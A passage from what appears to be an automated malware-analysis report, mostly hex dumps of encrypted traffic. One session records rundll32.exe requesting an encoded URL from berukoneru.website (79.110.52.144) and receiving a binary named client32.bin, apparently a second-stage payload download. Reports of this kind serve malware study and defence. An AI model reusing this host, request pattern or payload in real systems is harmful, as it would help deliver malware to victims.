                            2021-12-14 09:21:39 UTC1341INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                            Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                            2021-12-14 09:21:39 UTC1357INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                            Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            6192.168.2.64981979.110.52.144443C:\Windows\SysWOW64\rundll32.exe
                            TimestampkBytes transferredDirectionData
                            2021-12-14 09:21:39 UTC1364OUTGET /tire/tEXumA952Z/iljgXIorkNbq6MNPU/M3Mb2CH8XEAs/ZvNkij3gQew/dxKPUhxVjzkBtZ/B3kMEs_2FJYP69uLJ0Zru/_2BYjun6ZVTrWBF0/nSePp_2BxhkopWf/iGbA1ax9WTenbT0BwC/JetFByiwf/3LiswTAhhMHb0jpdGXHw/RYbbpWHEDIwmZCcWi7e/zfbtXmV0tr/6_2BifPd.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:39 UTC1364INHTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:39 GMT
                            Content-Type: application/zip
                            Content-Length: 268426
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=enj917fogsgcgtjb5lnpbut920; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:39 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:39 UTC1365INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                            Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                            2021-12-14 09:21:39 UTC1380INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                            Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                            2021-12-14 09:21:39 UTC1396INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                            Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                            2021-12-14 09:21:39 UTC1412INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                            Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                            2021-12-14 09:21:39 UTC1428INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                            Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                            2021-12-14 09:21:39 UTC1444INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                            Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                            2021-12-14 09:21:39 UTC1460INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                            Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                            2021-12-14 09:21:39 UTC1476INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                            Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                            2021-12-14 09:21:39 UTC1492INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                            Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                            2021-12-14 09:21:39 UTC1508INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                            Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                            2021-12-14 09:21:39 UTC1524INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                            Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                            2021-12-14 09:21:39 UTC1540INData Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                            Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
                            2021-12-14 09:21:39 UTC1556INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                            Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                            2021-12-14 09:21:39 UTC1572INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                            Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                            2021-12-14 09:21:39 UTC1588INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                            Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
                            2021-12-14 09:21:39 UTC1604INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                            Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                            2021-12-14 09:21:39 UTC1620INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
